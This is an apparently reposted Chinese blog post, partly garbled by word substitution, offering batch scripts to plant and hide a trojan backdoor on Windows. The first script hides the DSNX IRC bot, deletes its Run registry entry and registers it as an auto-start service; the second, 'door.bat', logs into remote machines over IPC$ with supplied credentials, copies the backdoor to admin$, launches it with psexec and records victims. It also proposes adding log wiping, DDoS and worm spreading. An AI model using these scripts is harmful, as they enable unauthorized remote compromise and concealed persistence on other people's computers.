批处理***与注册表
我们现在在使用一些比较老的***时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现***的自启动.然而这样很容易袒露***程序的路径,从而导致***被查杀,相对于地如果将***程序注册为系统服务则相对宁静一些.下面以设置装备摆设好地IRC***DSNX为例(名为windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统症结性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在同一目录下.批处理内容
尚可扩大,比方:参加扫除日记+DDOS的功能,,加入定时增加用户的功效,更深刻一点可使之具备主动传布功能(蠕虫).此处未几做叙述,有兴致的朋侪可自行钻研.
转载于:https://blog.51cto.com/dnsdhcp/592626
批处理***与注册表相关推荐
- 批处理删除注册表分支方法
双击Reg文件可以导入注册表, 那么如何删除注册表的键值和分支呢? 可以用Dos命令 reg.exe 来删除.举例如下: 假如我要清除WinRAR的历史记录,可以新建个批处理文件, 然后在里面加入如下 ...
- 批处理 修改注册表 禁用USB
需要禁用本机USB接口.可通过修改注册表来实现,最简单的方式就是用批处理执行. 首先 HKLM\SYSTEM\CurrentControlSet\services\USBSTOR 下Start值该为4 ...
- 批处理操作注册表教程
该文章转载自:http://wenku.baidu.com/view/ead0ab6fb84ae45c3b358cc2.html 可以在命令行中输入regedit来打开注册表,手动进行操作.也可以直接 ...
- 批处理操作注册表完全攻略(读取注册表/写入注册表等)
一,批处理生成.Reg文件操作注册表 用批处理中的重定向符号可以轻松地生成.reg文件.然后用命令执行.reg文件即可! 这里,着重要了解.reg文件操作注册表的方法. 首先.reg文件首行必须 ...
- 360修改注册表.html,求360急速浏览器更改主页的批处理或者注册表!
360极速默认浏览器注册表,套用的话,注意你浏览器路径了 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Class ...
- 批处理怎么调用计算机名,Reg命令使用详解 批处理操作注册表必备
只有在别无选择的情况下,才直接编辑注册表.注册表编辑器会忽略标准的安全措施,从而使得这些设置会降低性能.破坏系统,甚至要求用户重新安装Windows.可以利用"控制面板"或&quo ...
- bat添加修改注册表键值 批处理修改注册表项
1. 创建REG文件 REG文件的创建过程非常简单,可以通过任何一个文本文件编辑工具来实现.创建前记得先去掉"文件夹选项"中的"隐藏已知文件类型的扩展名"子项, ...
- 使用批处理修改注册表的命令参数
在cmd中输入reg /?查看帮助信息 REG Operation [Parameter List]Operation [ QUERY | ADD | DELETE | COPY |SAVE | LO ...
- 拥有管理员权限的安装包无法通过bat批处理写入注册表
拥有管理员权限的安装包无法通过批处理文件写入注册表 原文:https://stackoverflow.com/questions/63457336/nsis-with-admin-access-fai ...
最新文章
- 怎么看b树是几阶_看我在B站上怎么学习的
- linux vsftpd架设
- python缩进编码教程_python基础语法教程:行与缩进
- Mybatis中的一级缓存
- python高手能做什么_python高手们、能不能给新手写点心得,迷茫过、好方法、过渡期等等...
- AsyncTask源代码解析
- Windows 下 Redis 服务无法启动,错误 1067 进程意外终止解决方案
- hd看图怎么打印图片_二年级看图写话图片及范文10篇(可下载打印)
- thinkphp中volist 和foreach 的区别
- unity渲染管线及升级URP
- 图像处理——matlab人脸识别(1)
- 黑客帝国动态特效代码
- 【预测模型】趋势移动平均法预测发电量
- 【python】六一新玩法turtle画哆啦A梦
- 三泰串口卡linux驱动,工业多串口卡.pdf
- uploadify控件 上传图片到百度云存储
- ATK-DTU-M750 物联网模块+MQTT(阿里云)配置(一)
- linux的dve界面如何debug,VCS课时3:使用DVE进行Debug
- Word中只修改某一页的页眉页脚,其它页的保持不变
- mysql声明变量关键字_声明变量的关键字